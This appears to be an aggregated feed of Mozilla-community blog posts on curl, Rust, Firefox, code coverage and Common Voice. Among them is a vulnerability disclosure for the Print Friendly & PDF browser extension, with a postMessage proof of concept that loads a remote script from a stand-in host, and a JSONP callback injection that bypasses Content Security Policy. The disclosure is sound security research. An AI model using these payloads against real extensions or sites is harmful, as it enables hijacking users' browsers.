This essay was inspired by a twitter thread from March 22, 2021. The thread includes discussion of some technical aspects of PDHs. Future blog posts may talk about the technology and how we might go about creating them.

1    The person’s general purpose computer-like devices, not the hundreds of special purpose devices such as “smart” light switches or appliances in the surrounding ambient computing environment. A PDH may mediate a person’s interaction with such ambient devices but such devices are not a federated part of the PDH. Should a smart watch be federated into a PDH? Yes, usually. How about a heart pacemaker? NO!
2    Possibly hardwired to a “desktop” computer.

Daniel Stenbergcurl 7.76.1 – h2 works again

I’m happy to once again present a new curl release to the world. This time we decided to cut the release cycle short and do a quick patch release only two weeks since the previous release. The primary reason was the rather annoying and embarrassing HTTP/2 bug. See below for all the details.

Release presentation


the 199th release
0 changes
14 days (total: 8,426)

21 bug-fixes (total: 6,833)
30 commits (total: 27,008)
0 new public libcurl function (total: 85)
0 new curl_easy_setopt() option (total: 288)

0 new curl command line option (total: 240)
23 contributors, 10 new (total: 2,366)
14 authors, 6 new (total: 878)
0 security fixes (total: 100)
0 USD paid in Bug Bounties (total: 5,200 USD)


This was a very short cycle but we still managed to merge a few interesting fixes. Here are some:

HTTP/2 selection over HTTPS

This regression is the main reason for this patch release. I fixed an issue before 7.76.0 was released, and due to lack of covering tests with other TLS backends, nobody noticed that my fix also broke HTTP/2 selection over HTTPS when curl was built to use one of GnuTLS, BearSSL, mbedTLS, NSS, SChannel, Secure Transport or wolfSSL!

The problem I fixed for 7.76.0: I made sure that no internal code updates the HTTP version choice the user sets; it instead updates only the internal “we want this version” state. Without this fix, an application that reuses an easy handle could, without specifically asking for it, get another HTTP version in subsequent requests if a previous transfer had been downgraded. Clearly the fix was only partial.

The new fix should make HTTP/2 work and make sure the “wanted version” is used correctly. Fingers crossed!

Progress meter final update in parallel mode

When doing small and quick transfers in parallel mode with the command line tool, the logic could cause the final progress meter update call to be skipped!

file: support getting directories again

Another regression. A recent fix made curl not show a size for directories over FILE:// (if -I or -i is used). That fix did however also completely break “getting” such a directory…

HTTP proxy: only loop on 407 + close if we have credentials

When an HTTP(S) proxy returns a 407 response and closes the connection, curl would retry the request even if it had no credentials to use. If the proxy just consistently responded with the same 407 + close, curl would get stuck in a retry loop…

The fixed version now only retries the connection (with auth) if curl actually has credentials to use!
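The fixed decision can be sketched like this (a toy in Python for illustration, not curl’s actual C code):

```python
# Toy sketch of the fixed retry decision (not curl's implementation): after
# a 407 response, only re-issue the request with authentication if we
# actually have proxy credentials to send.
def should_retry_proxy_auth(status, connection_closed, have_credentials):
    if status != 407:
        return False  # only 407 means "proxy wants authentication"
    if connection_closed and not have_credentials:
        # Before the fix this case was retried anyway, so a proxy that
        # always answered 407 + close sent curl into an endless loop.
        return False
    return True

# Proxy closed the connection and we have nothing new to offer: give up.
assert should_retry_proxy_auth(407, True, False) is False
# With credentials available, retrying the request with auth makes sense.
assert should_retry_proxy_auth(407, True, True) is True
```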

Next release cycle

The plan is to make the next cycle two weeks shorter, to get us back on the previously scheduled path. This means that if we open the feature window on Monday, it will be open for just a little over two weeks, then give us three weeks of only bug-fixes before we ship the next release on May 26.

The next one is expected to become 7.77.0. Due to the rather short feature window this coming cycle I also fear that we might not be able to merge all the new features that are waiting to get merged.

Robert O'CallahanVisualizing Control Flow In Pernosco

In traditional debuggers, developers often single-step through the execution of a function to discover its control flow. One of Pernosco's main themes is avoiding single-stepping by visualizing state over time "all at once". Therefore, presenting control flow through a function "at a glance" is an important Pernosco feature and we've recently made significant improvements in this area.

This is a surprisingly hard problem. Pernosco records control flow at the instruction level. Compiler-generated debuginfo maps instructions to source lines, but lacks other potentially useful information such as the static control flow graph. We think developers want to understand control flow in the context of their source code (so approaches taken by, e.g., reverse engineering tools are not optimal for Pernosco). However, mapping potentially complex control flow onto the simple top-to-bottom source code view is inherently lossy or confusing or both.

For functions without loops there is a simple, obvious and good solution: highlight the lines executed, and let the user jump in time to a line’s execution by clicking on it. In the example below, we can see immediately where the function took an early exit.

To handle loops, Pernosco builds a dynamic control flow graph, which is actually a tree where leaf nodes are the execution of source lines, non-leaf nodes are the execution of a loop iteration and the root node is the execution of the function itself. Constructing a dynamic CFG is surprisingly non-trivial (especially in the presence of optimized code and large functions with long executions), but outside the scope of this post. Then, given a "current moment" during the function call, we identify which loop iterations are "current", and highlight the lines executed by those loop iterations; clicking on these highlights jumps directly to the appropriate point in time. Any lines executed during this function call but not in a current loop iteration are highlighted differently; clicking on these highlights shows all executions of that line in that function call. Hover text explains what is going on.
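That tree shape can be illustrated with a deliberately simplified toy (not Pernosco’s actual algorithm, which must also handle loop exits, nested loops, optimized code and long executions):

```python
# Toy sketch (not Pernosco's implementation): build a dynamic control-flow
# tree from a trace of executed line numbers, given one known loop header.
# Leaves are line executions; every revisit of the header opens a new
# "iteration" node under the function root.
def build_dynamic_cfg(trace, loop_header):
    root = {"kind": "function", "children": []}
    iteration = None
    for line in trace:
        if line == loop_header:
            iteration = {"kind": "iteration", "children": []}
            root["children"].append(iteration)
        target = iteration if iteration is not None else root
        target["children"].append({"kind": "line", "line": line})
    return root

# Lines 1-2 run once, then a loop headed at line 3 executes twice (lines 3-4).
cfg = build_dynamic_cfg([1, 2, 3, 4, 3, 4], loop_header=3)
iterations = [c for c in cfg["children"] if c["kind"] == "iteration"]
assert len(iterations) == 2
assert all(len(i["children"]) == 2 for i in iterations)
```

Given such a tree and a “current moment”, the debugger can identify the current iteration nodes and highlight exactly the leaf lines they contain.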

This presentation is still lossy — for example control-flow edges are not visible. However, user feedback has been very positive.

Try out Pernosco individual accounts or on-premises today!

This Week In Rust: This Week in Rust 386

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

No papers/research projects this week.

Project/Tooling Updates
Rust Walkthroughs

Crate of the Week

This week's crate is dipa, a crate to derive delta-encoding for Rust data structures.

Despite a lack of nominations, llogiq is very pleased with his choice.

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

329 pull requests were merged in the last week

Rust Compiler Performance Triage

A very quiet week overall.

Triage done by @simulacrum. Revision range: d322385..5258a74

1 Regressions, 0 Improvements, 0 Mixed

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

New RFCs

Upcoming Events

North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs



Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

What I actually value on a daily basis in [rust is] I can call code written by other people without unpleasant surprises.

async fn verify_signature(token: &Jwt) -> Result<Claims, VerificationError>

Looking at a code snippet:

  • I know my JWT token won't be mutated, just accessed ( & );
  • I know the function will probably perform some kind of I/O ( async );
  • I know that the function might fail ( Result );
  • I know its failure modes ( VerificationError ).

Luca Palmieri on Twitter

Thanks to Nixon Enraght-Moony for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Marco Castelluccio: On code coverage and regressions

There are two schools of thought when it comes to code coverage: those who think it is a useless metric and those who think the opposite (OK, I’m exaggerating a bit, there are people in the middle…).

I belong to the second “school”: I have always thought, intuitively, that patches without tests are more likely to cause post-release regressions, and so that having test coverage decreases risk.

A few days ago, I set out to confirm this intuition, and I found this interesting study: Code Coverage and Postrelease Defects: A Large-Scale Study on Open Source Projects.

The authors showed (on projects that are very different from Firefox, but still…) that there was no correlation between project coverage and the number of bugs introduced in the project and, more importantly, no correlation between file coverage and the number of bugs introduced in the file.

File coverage vs Patch coverage

So, it seemed to show that coverage is not a good predictor at all. I thought, though: we are not as interested in existing bugs as we are in not introducing new ones. The study showed that a file with high coverage has a similar chance of having bugs as a file with low coverage, but… what happens if we look at things at the patch level?

Maybe those files are covered just incidentally (because their functions are called while running tests for other related files), but the tests were not specifically designed for them.

Maybe the tests were written hastily when those files got introduced, and so they are already full of bugs.

What if we look instead at whether there is a correlation between patch coverage and the number of regressions introduced by those patches?

Of course, correlation is not causation, but we can at least make the case that, when new code is not automatically tested, we should be more careful and review it in more detail, or increase manual testing, or delay it to a new release to get more beta testing.

Data collection

Over the past few years, we have been collecting coverage data about Firefox patches.

It is not fully complete, as it doesn’t include Mac, it doesn’t include all possible Firefox configurations (e.g. Fission) and some languages like Python, but it does include the languages we use the most (JavaScript, C/C++, Rust), and it includes Linux and Windows (considering that a lot of Firefox code is cross-platform, I don’t see the missing Mac as a big limitation).

This means that we excluded the portions of the patches that touch Mac-specific code, Python code, etc., from the analysis.

I collected the data using bugbug and set out to explore it. I got 10938 clean patches, and 2212 buggy ones.

Box plots of bug-introducing vs clean patch code coverage

First, I plotted the data using a box plot:

Figure 1: Box plots of the code coverage for bug-introducing vs clean patches.

It doesn’t tell me much. The median is higher in the case of “clean” patches though (~92% vs ~87%).

Scatter plot of lines added/covered by bug-introducing vs clean patches

Then, I plotted a scatter plot with “added lines” as the x-axis, “covered lines” as the y-axis, and color being “clean” or “buggy”. What I expected to find: more “clean” patches than “buggy” ones close to the line f(added) = covered (that is, covered == added).

Figure 2: Scatter plot of lines added/covered by bug-introducing vs clean patches.

There are a lot of outliers, so let’s zoom in a bit:

Figure 3: Zoomed scatter plot of lines added/covered by bug-introducing vs clean patches.

It seems to partly match what I expected, but… hard to tell really.

Distributions of bug-introducing vs clean patch coverage

Next step: plotting empirical distribution functions for the two distributions. These curves show, for a given proportion of patches on the x axis, the level of coverage that at least that proportion of patches reaches (e.g. for the distribution of “clean patches”, when x is 0.8, y is 0.4, meaning that 80% of clean patches have more than 40% coverage):

Figure 4: Distributions of bug-introducing vs clean patch coverage.

Now we can clearly see that while 45% of clean patches have 100% coverage, only around 25% of buggy patches do. The proportions of patches with coverage between 80% and 100% are similar, but non-buggy patches more often present higher coverage than buggy ones. For the remaining 40% of patches (from 0.6 to 1.0 in the chart above) there are no meaningful differences.
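As a rough illustration of how such curves are derived (with made-up numbers, not the actual Firefox data), one can compute, for each coverage threshold, the proportion of patches at or above it:

```javascript
// Sketch: per-patch coverage ratios (0..1). The sample values below are
// invented for illustration only.
function proportionAtOrAbove(coverages, threshold) {
  const hits = coverages.filter((c) => c >= threshold).length;
  return hits / coverages.length;
}

const clean = [1.0, 1.0, 0.92, 0.87, 0.5]; // hypothetical samples
const buggy = [1.0, 0.87, 0.6, 0.4];

// Compare how often each group reaches full coverage:
proportionAtOrAbove(clean, 1.0); // 0.4
proportionAtOrAbove(buggy, 1.0); // 0.25
```

Sweeping the threshold from 1.0 down to 0 yields one curve per group.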

What I learned

To summarize, we can see that there is a correlation between coverage and bug proneness. In particular, fully covered patches more rarely cause post-release bugs. Of course, correlation does not mean causation. We can’t tell for sure that writing tests for new code changes will reduce the riskiness of those changes, but we can definitely say that we can increase our attention level when changes are not covered by tests.

The Rust Programming Language Blog: Brainstorming Async Rust's Shiny Future

On March 18th, we announced the start of the Async Vision Doc process. Since then, we've landed 24 "status quo" stories and we have 4 more stories in open PRs; Ryan Levick and I have also hosted more than ten collaborative writing sessions over the course of the last few weeks, and we have more scheduled for this week.

Now that we have a good base of "status quo" stories, we are starting to imagine what the ✨ "shiny future" ✨ might look like. We want your help! If you have a great idea for Async Rust[1], then take a look at the template and open a PR! Alternatively, if you have an idea for a story but would like to discuss it before writing, you can open a "shiny future" issue. Also, we would still love to get more "status quo" stories, so please continue to share those.

When writing "shiny future" stories, the goal is to focus on the experience of Rust's users first and foremost, and not so much on the specific technical details. In fact, you don't even have to know exactly how the experience will be achieved. We have a few years to figure that out, after all. 🚀

Every "shiny future" story is a "retelling" of one or more "status quo" stories. The idea is to replay the same scenario but hopefully with a happier ending, as a result of the improvements we've made. If you don't see a "status quo" story that is right for telling your "shiny future" story, though, that's no problem! Write up your story and we'll figure out the "status quo" story it addresses. There is always the option of writing a new "status quo" story, too; we are still requesting "status quo" and "shiny future" stories, and we will do so right up until the end.

If you'd like to see what a "shiny future" story looks like, we have merged one example, Barbara Makes a Wish. This story describes Barbara's experiences using a nifty new tool that gives her lots of information about the state of her async executor. It is a "retelling" of the "status quo" story Barbara Wants Async Insights.

What is the async vision doc and how does it work?

Here is the idea in a nutshell:

We are launching a collaborative effort to build a shared vision document for Async Rust. Our goal is to engage the entire community in a collective act of the imagination: how can we make the end-to-end experience of using Async I/O not only a pragmatic choice, but a joyful one?

As described in the original announcement, the vision document is structured as a series of "status quo" and "shiny future" stories. Each story describes the experiences of one or more of our four characters as they go about achieving their goals using Async Rust.

The "status quo" stories describe the experiences that users have today. They are an amalgamation of the real experiences of people using Async Rust, as reported to us by interviews, blog posts, and tweets. The goal with these stories is to help us understand and gauge the cumulative impact that problems can have on our users.

The "shiny future" stories describe those same characters achieving those same goals, but looking forward a few years into the future. They are meant to illustrate the experience we are aiming towards, and to give the overall context for the RFCs and other kinds of changes we want to pursue.

The brainstorming period and what comes next

We are currently in the midst of the brainstorming period. This means that we are seeking to collect as many stories -- both about the "status quo" and the "shiny future" -- as we can. The brainstorming period lasts until the end of April. After that, the working group leads are going to merge the remaining stories and get to work drafting a synthesized vision document that incorporates elements of the various stories that have been submitted.

Going forward, we plan to revisit the vision document regularly. We fully expect that some aspects of the "shiny future" stories we write are going to be wrong, sometimes very wrong. We will be regularly returning to the vision document to check how things are going and adjust our trajectory appropriately.

This sounds cool, how can I get involved?

If you'd like to help, we'd love to have you! If you've got an idea for a story, then feel free to create a PR to the wg-async-foundations repository based on one of the following templates:

If you'd like a bit more inspiration, then you can join Ryan Levick and me at one of our vision doc writing sessions. We have more sessions scheduled this week and you can look for announcements from us on Twitter or check the #wg-async-foundations stream on the rust-lang Zulip.

  1. Don't be modest. You know you do.

Andrew Halberstadt: Phabricator Etiquette Part 1: The Reviewer

In the next two posts we will examine the etiquette of using Phabricator. This post will cover tips from the reviewer’s perspective, and next week will focus on the author’s point of view. While the social aspects of etiquette are incredibly important (we should all be polite and considerate), these posts will focus more on the mechanics of using Phabricator. In other words, how to make the review process as smooth as possible without wasting anyone’s time.

Let’s dig in!

Wladimir Palant: Print Friendly & PDF: Full compromise

I looked into the Print Friendly & PDF browser extension while helping someone figure out an issue they were having. The issue turned out unrelated to the extension, but I already noticed something that looked very odd. A quick investigation later I could confirm a massive vulnerability affecting all of its users (close to 1 million of them). Any website could easily gain complete control of the extension.

Print Friendly & PDF in Chrome Web Store: 800,000+ users

This particular issue has been resolved in Print Friendly & PDF 2.7.39 for Chrome. The underlying issues have not been addressed however, and the extension is still riddled with insecure coding practices. Hence my recommendation is still to uninstall it. Also, the Firefox variant of the extension (version 1.3) is still affected. I did not look at the Microsoft Edge variant but it hasn’t been updated recently and might also be vulnerable.

Note: To make the confusion complete, there is a browser extension called Print Friendly & PDF 2.1.0 on the Firefox Add-ons website. This one has no functionality beyond redirecting the user to printfriendly.com and isn’t affected. The problematic Firefox extension is being distributed from the vendor’s website directly.

Summary of the findings

As of version 2.7.33 for Chrome and 1.3 for Firefox, Print Friendly & PDF marked two pages (algo.html and core.html) as web-accessible, meaning that any web page could load them. The initialization routine for these pages involved receiving a message event, something that a website could easily send as well. Part of the message data were scripts that would then be loaded in extension context. While normally Content Security Policy would prevent exploitation of this Cross-Site Scripting vulnerability, here this protection was relaxed to the point of being easily circumvented. So any web page could execute arbitrary JavaScript code in the context of the extension, gaining any privileges that the extension had.

The only factor slightly alleviating this vulnerability was the fact that the extension did not request too many privileges:

"permissions": [ "activeTab", "contextMenus" ],

So any code running in the extension context could “merely”:

  • Persist until a browser restart, even if the website it originated from is closed
  • Open new tabs and browser windows at any time
  • Watch the user opening and closing tabs as well as navigating to pages, but without access to page addresses or titles
  • Arbitrarily manipulate the extension’s icon and context menu item
  • Gain full access to the current browser tab whenever this icon or context menu item was clicked

Insecure communication

When the Print Friendly & PDF extension icon is clicked, the extension first injects a content script into the current tab. This content script then adds a frame pointing to the extension’s core.html page. This requires core.html to be web-accessible, so any website can load that page as well (here assuming Chrome browser):

<iframe src="chrome-extension://ohlencieiipommannpdfcmfdpjjmeolj/core.html"></iframe>

Next, the content script needs the frame to initialize. It takes a shortcut by using window.postMessage to send a message to the frame. While convenient, this API is rarely used securely in browser extensions (see the Chromium issue I filed). Here is what the receiving end looks like in this case:

window.addEventListener('message', function(event) {
  if (event.data) {
    if (event.data.type === 'PfLoadCore' && !pfLoadCoreCalled) {
      pfLoadCoreCalled = true;
      var payload = event.data.payload;
      var pfData = payload.pfData;
      var urls = pfData.config.urls;

      helper.loadScript(urls.js.core, function() {
        window.postMessage({type: 'PfStartCore', payload: payload}, '*');
      });
      helper.loadCss(urls.css.pfApp, 'screen');
    }
  }
});
No checks are performed here; any website can send a message like that. And helper.loadScript() does exactly what you would expect: it adds a <script> tag to the current (privileged) extension page and attempts to load whatever script it was given.
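For contrast, here is a hypothetical hardening sketch (not the vendor's code): even if the message exchange were kept, the frame could at least refuse script URLs from origins the vendor does not control. As the rest of the post shows, this alone would not have been sufficient here, but it narrows the attack surface considerably:

```javascript
// Hypothetical allowlist check: only load scripts from origins the
// extension vendor controls. The allowlist entry is an assumption made
// for illustration.
const ALLOWED_SCRIPT_ORIGINS = new Set([
  "https://www.printfriendly.com",
]);

function isAllowedScriptUrl(url) {
  try {
    return ALLOWED_SCRIPT_ORIGINS.has(new URL(url).origin);
  } catch (e) {
    return false; // not a valid absolute URL
  }
}

isAllowedScriptUrl("https://www.printfriendly.com/core.js"); // true
isAllowedScriptUrl("https://example.com/xss.js"); // false
```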

So any web page that loaded this frame can do the following:

// "frame" is the <iframe> element created above
var url = "https://example.com/xss.js";
frame.contentWindow.postMessage({
  type: "PfLoadCore",
  payload: {
    pfData: {
      config: {
        urls: {
          js: {
            core: url
          }
        }
      }
    }
  }
}, "*");

And the frame will attempt to load this script in the extension context.

Getting around Content Security Policy

With most web pages, this would be the point where attackers could run arbitrary JavaScript code. Browser extensions, however, are always protected by Content Security Policy. The default script-src 'self' policy makes exploiting Cross-Site Scripting vulnerabilities difficult (but not impossible).

But Print Friendly & PDF does not stick to the default policy. Instead, what they have is the following:

"content_security_policy": "script-src 'self'

Yes, that’s a very long list of web servers that JavaScript code can come from. In particular, the CDN servers host all kinds of JavaScript libraries. But one doesn’t really have to go there. Elsewhere in the extension code one can see:

var script = document.createElement("script");
script.src = this.config.hosts.ds_cdn +
    "/api/v3/domain_settings/a?callback=pfMod.saveAdSettings&hostname=" +
    this.config.hosts.page + "&client_version=" + hokil.version;

See that callback parameter? That’s JSONP, the crutch web developers used for cross-domain data retrieval before Cross-Origin Resource Sharing was widely available. It’s essentially Cross-Site Scripting, but intentional. And the callback parameter becomes part of the script.

Nowadays, JSONP endpoints kept around for legacy reasons will usually only allow certain characters in the callback name. Not so in this case. Loading https://www.printfriendly.com/api/v3/domain_settings/a?callback=alert(location.href)//&hostname=example.com will result in the following script:

alert(location.href)//({…})
So here we can inject any code into a script that is located on the www.printfriendly.com domain. If we ask the extension to load this one, Content Security Policy will no longer prevent it. Done, injection of arbitrary code into the extension context, full compromise.

What’s fixed and what isn’t

More than two months after reporting this issue I checked in on the progress. I discovered that, despite several releases, the current extension version was still vulnerable. So I sent a reminder to the vendor, warning them about the disclosure deadline getting close. The response was reassuring:

We are working on it. […] We will be finishing the update before the deadline.

When I finally looked at the fix before this publication, I noticed that it merely removed the problematic message exchange. The communication now went via the extension’s background page as it should. That’s it.

While this prevents exploitation of the issue as outlined here, all other problematic choices remain intact. In particular, the extension continues to relax Content Security Policy protection. Given how this extension works, my recommendation was hosting the core.html frame completely remotely. This has not been implemented.

No callback name validation has been added to the JSONP endpoints on www.printfriendly.com (there are multiple), so Content Security Policy integrity hasn’t been ensured this way either.
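Such validation is straightforward; here is a hypothetical sketch (not the vendor's code) of the usual restriction on callback names:

```javascript
// Hypothetical server-side check: accept only identifier-like callback
// names (optionally dotted), rejecting anything containing parentheses,
// slashes or other script syntax.
function isSafeJsonpCallback(name) {
  return /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/.test(name);
}

isSafeJsonpCallback("pfMod.saveAdSettings"); // true
isSafeJsonpCallback("alert(location.href)//"); // false
```

With a check like this in place, the CSP bypass described above would no longer work.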

Not just that, the extension continues to use JSONP for some functionality, even in privileged contexts. The JavaScript code executed here comes not merely from www.printfriendly.com but also from api.twitter.com for example. For reference: there is absolutely no valid reason for a browser extension to use JSONP.

And while the insecure message exchange has been removed, some of the extension’s interactions with web pages remain highly problematic.


  • 2021-01-13: Reported the vulnerability to the vendor
  • 2021-01-13: Received confirmation that the issue is being looked at
  • 2021-03-21: Reminded the vendor of the disclosure deadline
  • 2021-03-22: Received confirmation that the issue will be fixed in time
  • 2021-04-07: Received notification about the issue being resolved
  • 2021-04-12: Notified the vendor about outstanding problems and lack of a Firefox release

Daniel Stenberg: talking curl on changelog again

We have almost a tradition now, me and the duo Jerod and Adam of the Changelog podcast. We talk curl and related stuff every three years. Back in 2015 we started out in episode 153 and we did the second one in episode 299 in 2018.

Time flies, and now in 2021 we once again “met up” virtually and talked curl and related stuff for a while. curl is now 23 years old and I still run the project. A few things have changed since the last curl episode, so I asked my Twitter friends what they wanted to know, and I think we managed to get a whole bunch of those topics into the mix.

So, here’s the 2021 edition of Daniel on the Changelog podcast: episode 436.

The Changelog 436: Curl is a full-time job (and turns 23) – Listen on Changelog.com

Anyone want to bet if we’ll do it again in 2024?

Firefox Nightly: These Weeks in Firefox: Issue 91


  • Starting from Firefox 89, we now support dynamic imports in extension content scripts. Thanks to evilpie for working on fixing this long standing enhancement request!
    • NOTE: the docs have not been updated yet, refer to the new test cases landed as part of Bug 1536094 to get an idea of how to use it in extension content scripts.
  • Entering a term like “seti@home” or “folding@home” in the URL bar should now search by default, rather than treating it like a URL (Bug 1693503)

Friends of the Firefox team

For contributions made from March 23, 2021 to April 6, 2021, inclusive.

Resolved bugs (excluding employees)

Fixed more than one bug

  • Anshul Sahai
  • Claudia Batista [:claubatista]
  • Falguni Islam
  • Itiel
  • Kajal Sah
  • Michelle Goossens
  • Tim Nguyen :ntim

Project Updates

Add-ons / Web Extensions

WebExtensions Framework
  • Changes to devtools API internals related to the ongoing DevTools Fission work (Bug 1699493). Thanks to Alex Poirot for taking care of the extension APIs side of this fission-related refactoring.
  • Allowed sandboxed extension sub frames to load their own resources (Bug 1700762)
  • Fixed a non-critical regression in the error message for a browser.runtime.sendMessage call targeting the ID of an extension that isn’t installed (Bug 1643176):
    • NOTE: non-critical because the regression was hiding the expected error message behind a generic “An unexpected error occurred” message, but under conditions that were already expected to return a rejected promise
  • Small Fission-related fix for errors logged while an iframe attached by a content script navigates to a URL loaded in a different content process (Bug 1697774)
    • NOTE: the issue wasn’t actually introducing any breakage, but that is an expected scenario in fission and it should be handled gracefully to avoid spamming the logs
WebExtension APIs
  • webNavigation API: parts of the webNavigation API internals have been rewritten in C++ as part of the Fission-related changes to the WebExtensions framework (Bug 1581859). Thanks to Kris Maglione for his work on this fission-related refactoring
    • NOTE: let us know if you notice behavior regressions that may be related to the webNavigation API (e.g. D110173, attached to Bug 1594921, fixed a regression where webNavigation events for the initial about:blank document were emitted more often than in the previous “frame scripts”-based implementation)
  • tabs API: Fixed a bug that turned a hidden tab’s URL into “about:blank” when the hidden tab was moved between windows while an extension had registered a tabs.onUpdated listener using a URL-based event filter (Bug 1695346).
Addon Manager & about:addons
  • Fixed regression related to the about:addons extensions options page modals (Bug 1702059)
    • NOTE: In Firefox 89, WebExtensions options_ui pages will keep using the previous tab-modal implementation. This is helpful in the short run, as it allows our Photon tab prompts restyling to ride the train as is; in a follow-up we will have to do some more work to port these modals to the new implementation
  • Bug 1689240: Last bits of a set of simplifications and internal refactoring for the about:addons page initially contributed by ntim (plus some more tweaks we did to finalize and land it). Thanks to ntim for getting this started!

Installer & Updater

Messaging System

  • Launched the “1-Click Pin During Onboarding” experiment to 100% of new Firefox 87 users on Windows 1903+ via Nimbus Preview -> Live (avoiding a copy/paste error from stage)

Password Manager


  • Doug Thayer fixed a bug where skeleton UI was breaking scroll inertia on Windows.
  • Emma Malysz is continuing work on OS.File bugs.
  • Florian Quèze is fixing tests and cleaning up old code.

Performance Tools

  • Enabled the new profiler recording panel in dev edition (thanks nicolas from devtools team).
  • Added Android device information inside the profile data and started to show it in the profile meta panel.
  • Fixed the network markers with service workers. Previously it was common to see “unfinished” markers. More fixes are coming.
  • Removed many MOZ_GECKO_PROFILER ifdefs. Fewer places to potentially break on Tier-3 platform builds.
  • You can now import the Android trace format into the Firefox Profiler analysis UI. Just drag and drop the .trace file into profiler.firefox.com and it will be imported and opened automatically.
  • Added new markers:
    • Test markers (in TestUtils.jsm and BrowserTestUtils.jsm)
    • “CSS animation”
    • “CSS transition”

Search and Navigation

  • Fixed flickering of some specific results in the Address Bar – Bug 1699211, Bug 1699227
  • New tab search field hand-off to the Address Bar now uses the default Address Bar empty search mode instead of entering Search Mode for the default engine – Bug 1616700
  • The Search Service now exposes an “isGeneralPurposeEngine” property on search engines that identifies engines searching the Web at large, rather than specific resources or products. This may be extended in the future to provide some kind of categorization of engines. – Bug 1697477
  • Re-enabling a WebExtension engine now re-prompts the user to confirm whether it should be set as the default search engine – Bug 1646338


The Mozilla Blog: Mozilla partners with NVIDIA to democratize and diversify voice technology

As technology makes a massive shift to voice-enabled products, NVIDIA invests $1.5 million in Mozilla Common Voice to transform the voice recognition landscape

Over the next decade, speech is expected to become the primary way people interact with devices — from laptops and phones to digital assistants and retail kiosks. Today’s voice-enabled devices, however, are inaccessible to much of humanity because they cannot understand vast swaths of the world’s languages, accents, and speech patterns.

To help ensure that people everywhere benefit from this massive technological shift, Mozilla is partnering with NVIDIA, which is investing $1.5 million in Mozilla Common Voice, an ambitious, open-source initiative aimed at democratizing and diversifying voice technology development.

Most of the voice data currently used to train machine learning algorithms is held by a handful of major companies. This poses challenges for others seeking to develop high-quality speech recognition technologies, while also exacerbating the voice recognition divide between English speakers and the rest of the world.

Launched in 2017, Common Voice aims to level the playing field while mitigating AI bias. It enables anyone to donate their voices to a free, publicly available database that startups, researchers, and developers can use to train voice-enabled apps, products, and services. Today, it represents the world’s largest multi-language public domain voice data set, with more than 9,000 hours of voice data in 60 different languages, including widely spoken languages and less used ones like Welsh and Kinyarwanda, which is spoken in Rwanda. More than 164,000 people worldwide have contributed to the project thus far.

This investment will accelerate the growth of Common Voice’s data set, engage more communities and volunteers in the project, and support the hiring of new staff.

To support the expansion, Common Voice will now operate under the umbrella of the Mozilla Foundation as part of its initiatives focused on making artificial intelligence more trustworthy. According to the Foundation’s Executive Director, Mark Surman, Common Voice is poised to pioneer data donation as an effective tool the public can use to shape the future of technology for the better.

“Language is a powerful part of who we are, and people, not profit-making companies, are the right guardians of how language appears in our digital lives,” said Surman. “By making it easy to donate voice data, Common Voice empowers people to play a direct role in creating technology that helps rather than harms humanity. Mozilla and NVIDIA both see voice as a prime opportunity where people can take back control of technology and unlock its full potential.”

“The demand for conversational AI is growing, with chatbots and virtual assistants impacting nearly every industry,” said Kari Briski, senior director of accelerated computing product management at NVIDIA. “With Common Voice’s large and open datasets, we’re able to develop pre-trained models and offer them back to the community for free. Together, we’re working toward a shared goal of supporting and building communities — particularly for under-resourced and under-served languages.”

The post Mozilla partners with NVIDIA to democratize and diversify voice technology appeared first on The Mozilla Blog.

Niko Matsakis: Async Vision Doc Writing Sessions V

This is an exciting week for the vision doc! As of this week, we are starting to draft “shiny future” stories, and we would like your help! (We are also still working on status quo stories, so there is no need to stop working on those.) There will be a blog post coming out on the main Rust blog soon with all the details, but you can go to the “How to vision: Shiny future” page now.

This week, Ryan Levick and I are going to be hosting four Async Vision Doc Writing Sessions. Here is the schedule:

When | Who | Topic
Wed at 07:00 ET | Ryan | TBD
Wed at 15:00 ET | Niko | Shiny future – Niklaus simulates hydrodynamics
Fri at 07:00 ET | Ryan | TBD
Fri at 14:00 ET | Niko | Shiny future – Portability across runtimes

The idea for shiny future is to start by looking at the existing stories we have and to imagine how they might go differently. To be quite honest, I am not entirely sure how this is going to work, but we’ll figure it out together. It’s going to be fun. =) Come join!

Support.Mozilla.OrgWhat’s up with SUMO – Q1 2021

Hey SUMO folks,

Starting this month, we’d like to revive our old tradition of summarizing what’s happening in our SUMO nation. But instead of weekly like the old days, we’re going to have monthly updates. This post will be an exception, though, as we’d like to recap the entire Q1 of 2021.

So, let’s get to it!

Welcome on board!

  1. Welcome to bingchuanjuzi (rebug). Thank you for contributing to 62 zh-CN articles despite only getting started in Oct 2020.
  2. Hello and welcome, Vinay, to the Gujarati localization group. Thanks for picking up the work in a locale that has been inactive for a while.
  3. Welcome back to JCPlus. Thank you for stewarding the Norsk (No) locale.
  4. Welcome, brisu and Manu! Thank you for helping us with Firefox for iOS questions.
  5. Welcome, Kaio Duarte, to the Social Support program!
  6. Welcome back to Devin and Matt C in the Social Support program (Devin has helped us with Buffer Reply, and Matt was part of the Army of Awesome program in the past).

Last but not least, let’s welcome Fabi and Daryl to the SUMO team. Fabi is the new Technical Writer (though I should note that she will be helping us with Spanish localization as well) and Daryl is joining us as a Senior User Experience Designer. Welcome, both!

Community news

  • Play Store Support is transitioning to Conversocial. Please read the full announcement in our blog if you haven’t.
  • Are you following news about Firefox? If so, I have good news for you: you can now subscribe to the Firefox Daily Digest to get updates about what people are saying about Firefox and other Mozilla products on social media like Reddit and Twitter.
